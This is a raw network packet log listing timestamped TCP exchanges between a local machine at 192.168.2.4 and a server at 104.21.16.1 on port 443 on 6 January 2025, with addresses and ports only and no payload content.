                                                                                                  Jan 6, 2025 13:55:22.272808075 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.272814035 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.272859097 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.272892952 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.272907019 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.272963047 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.272969007 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.273008108 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.326132059 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.326147079 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.326210022 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.326222897 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.326265097 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.327581882 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327594995 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327647924 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.327655077 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327693939 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.327872992 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327888012 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327941895 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.327948093 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.327989101 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.328161955 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.328176022 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.328236103 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.328239918 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.328278065 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.359772921 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.359788895 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.359867096 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.359874010 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.360017061 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.361962080 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.361979008 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362023115 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362027884 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362061024 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362087011 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362109900 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362126112 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362184048 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362189054 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362198114 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362219095 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362222910 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362231970 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.362252951 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.362287998 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.414802074 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.414824963 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.414887905 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.414900064 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.414942026 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416117907 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416132927 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416193008 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416198969 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416239977 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416320086 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416332960 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416373968 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416378975 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416400909 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416424036 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416677952 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416692972 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416749954 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.416755915 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.416796923 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.448190928 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.448208094 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.448267937 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.448273897 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.448318958 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450234890 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450252056 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450300932 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450306892 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450356007 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450495958 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450510025 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450563908 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450571060 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450625896 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450861931 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450876951 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450927019 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.450932980 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.450973034 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.503272057 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.503288984 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.503334999 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.503345013 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.503355980 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504170895 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504564047 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504580021 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504621029 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504626036 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504651070 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504659891 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504795074 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504810095 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504863977 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.504868984 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.504913092 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.505213976 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.505227089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.505270004 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.505274057 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.505300045 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.505311966 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.536607027 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.536622047 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.536678076 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.536684036 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.536722898 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.538707018 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.538721085 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.538763046 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.538767099 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.538793087 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.538811922 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.539076090 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539092064 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539136887 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.539141893 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539180994 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.539401054 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539416075 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539462090 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.539468050 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.539505959 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.591754913 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.591775894 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.591871023 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.591880083 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.592026949 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.592888117 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.592901945 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.592972040 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.592978954 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593024969 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.593252897 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593266010 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593328953 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.593333960 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593379974 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.593633890 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593648911 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593699932 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.593710899 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.593756914 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.625140905 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.625157118 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.625411987 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.625421047 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.625477076 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.627197981 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627213955 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627269030 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.627274990 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627551079 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627571106 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627832890 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.627846003 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.631162882 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.631175041 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.676264048 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.680346012 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.680366993 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.680461884 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.680470943 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.680517912 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.681333065 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681348085 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681411028 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.681416988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681453943 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.681737900 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681755066 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681806087 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.681812048 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.681858063 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.682003975 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.682018995 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.682066917 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.682074070 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.682125092 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.713773966 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.713790894 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.713958979 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.713968039 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.714020967 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.715677023 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.715692997 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.715751886 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.715759039 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.715800047 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.715997934 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716015100 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716070890 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.716077089 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716115952 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.716609955 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716624022 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716676950 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.716684103 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.716708899 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.716727972 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.768829107 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.768848896 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.769028902 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.769037962 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.769093990 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771296024 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771317959 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771365881 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771377087 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771383047 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771413088 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771420956 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771447897 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771451950 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771481037 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771500111 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771500111 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771511078 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771533966 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771557093 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771564007 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.771593094 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.771619081 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.802184105 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.802201033 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.802282095 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.802293062 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.802439928 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804112911 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804141045 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804186106 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804192066 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804219961 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804239988 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804477930 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804497004 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804537058 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804543018 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.804573059 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.804586887 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.805017948 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.805037022 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.805087090 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.805093050 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.805135012 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.857290030 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.857312918 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.857475996 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.857475996 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.857487917 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.857532024 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.859652996 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.859668970 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.859723091 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.859730005 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.859775066 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.859925032 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.859940052 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.859992981 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.859997988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.860038996 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.860280991 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.860296011 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.860346079 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.860351086 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.860389948 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.890577078 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.890592098 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.890645027 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.890650988 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.890691996 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908164978 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908183098 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908269882 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908286095 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908432961 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908442974 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908457994 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908514977 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908519983 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908529043 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908551931 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908571005 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908576012 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.908608913 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.908624887 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.945739031 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.945755959 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.945842028 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.945852041 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.946003914 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948210955 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948226929 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948287964 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948293924 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948337078 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948373079 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948391914 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948446989 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948452950 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948494911 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948787928 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948802948 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948857069 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.948863983 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.948903084 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:22.979156017 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:22.979172945 CET44349741104.21.16.1192.168.2.4
